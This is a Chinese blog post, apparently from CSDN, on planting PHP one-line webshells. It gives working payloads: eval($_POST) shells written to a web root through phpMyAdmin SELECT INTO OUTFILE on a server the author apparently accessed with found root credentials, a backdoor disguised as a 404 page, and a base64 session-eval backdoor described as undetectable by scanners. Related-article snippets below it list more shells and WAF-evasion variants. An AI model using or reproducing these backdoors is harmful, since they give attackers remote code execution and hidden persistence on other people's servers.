php中fputs写入一句话,phpmyadmin写入一句话木马的测试

最新推荐文章于 2021-03-11 03:54:25 发布
最新推荐文章于 2021-03-11 03:54:25 发布
阅读量934 收藏 2
点赞数
文章标签: php中fputs写入一句话
本文介绍了多种PHP一句话木马的测试方法,包括通过fputs写入和phpmyadmin导出,以及如何利用404页面和无特征码进行隐藏。还探讨了超级隐蔽的PHP后门和层级请求运行的后门技术,提醒开发者注意防范。
摘要由CSDN通过智能技术生成

方法一,一句话木马

偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select'<?php  @eval($_POST[-77]);?>'INTO OUTFILE 'E:\Web\wp-content\errors.php'

提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题

接着尝试:select'<?php  @eval($_POST[-77]);?>'INTO OUTFILE 'E:\\Web\\xxx.xx.vn\\wp-content\\errors.php'

再次导入,提示成功,访问后发现真的成功了。

另一种一句话木马

服务器上发现被植了很多木马,而且还让人肆意使用...NND<?php  @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

利用404页面隐藏PHP小马:HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

404 Not Found

Not Found

The requested URL was not found on this server.

@preg_replace("/[pageerror]/e",$_POST['error'],"saft");

header('HTTP/1.1 404 Not Found');

?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话:<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:

仅用GET函数就构成了木马;

利用方法:

最低0.47元/天 解锁文章
西子57
关注
Webshell上传方式
悦分享
07-31 3902
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
后门学习记录
aaaxinxin_的博客
01-22 4011
后门学习记录Webshell释义:Webshell来源:Webshell详述:Shell(计算机壳层)Linux的shell分类:WebshellWebshell分类小马/一句话木马大马上传Webshell的方法归类(1)解析漏洞上传1. iis目录解析漏洞2. 文本解析漏洞3. 文件名解析4. fast-CGI解析漏洞5. apache解析漏洞(2)截断上传(3)后台数据库备份(4)利用数据库语句上传1. mysql数据库into outfield2. 建立新表写入木马3. phpMyadmin 设置错误
php mysql 注入一句话木马_phpmyadmin一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1341
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
php超强后门在任意位置创建文件,web后门 那些强悍猥琐流的PHP一句话后门大全分享...
weixin_36094492的博客
03-09 559
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:复制代码代码如下:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replac...
PHP一句话
weixin_34054866的博客
12-20 2483
<?php @eval($_POST[pp]);?> 这是一段PHP木马代码,也就是我们所说的后门程序 为什么说这段代码是后门程序? 其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际太容易被查出来了, 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 就这一句话害死人,这样任何人都可以post...
php一句话大全,[各种一句话木马大全]各种一句话
weixin_39995351的博客
03-11 8814
PHP一句话:1、普通一句话2、防爆破一句话 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句话 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句话preg_replace()方法的e,只适用于php5及更早...
深入浅出玩转php一句话(含过waf新姿势)
热门推荐
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
【漏洞复现】phpmyadmin后台任意文件包含(CVE-2018-12613)
野原新之助
09-29 826
由于对index.php包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
DVWA之PHP文件包含漏洞(File Inclusion)
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
@php一句话猥琐流搞法
fengling132的专栏
04-20 1205
在渗透常常遇到拦截eval的,所以 这种形式的会被拦截 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) 这种形式可以绕过,另外还有其他形式         今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。   完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
PHP一句话 免杀版
10-23
PHP一句话 免杀版
最新php一句话
收集盒 Book box
10-28 816
第一种:1.php $_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://127.0.0.1/1.php?2=assert密码是1 第二种2.php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://127.
php一句话利用,常见php一句话webshell解析
weixin_39606361的博客
03-10 5024
我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。最基础的 php webshell1将 post 请求的 CMD 参数直接执行。1原理浅析:1、在PHP脚本语言,eval(code)的功能是将code组合成php指令,然后将指令执行。2、就相...
php 一句话木马简介
whatday的专栏
07-01 1万+
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 341
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
有趣的PHP一句话
aijin3040的博客
07-16 192
今天看到如下图所示的PHP一句话,觉得挺有意思。 代码如下: <?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?> 效果图: 看下图注释应该就可以一目了然了,就是根据异或运算得到$_=’_GET’。 如果想换成POST方法,则可变化如下。 <?=~$_='$+...
PHP一句话木马小结与SQL语句写一句话木马
09-11 306
一、基础类的一句话--功能仅限于验证漏洞了,实际非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_dec...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值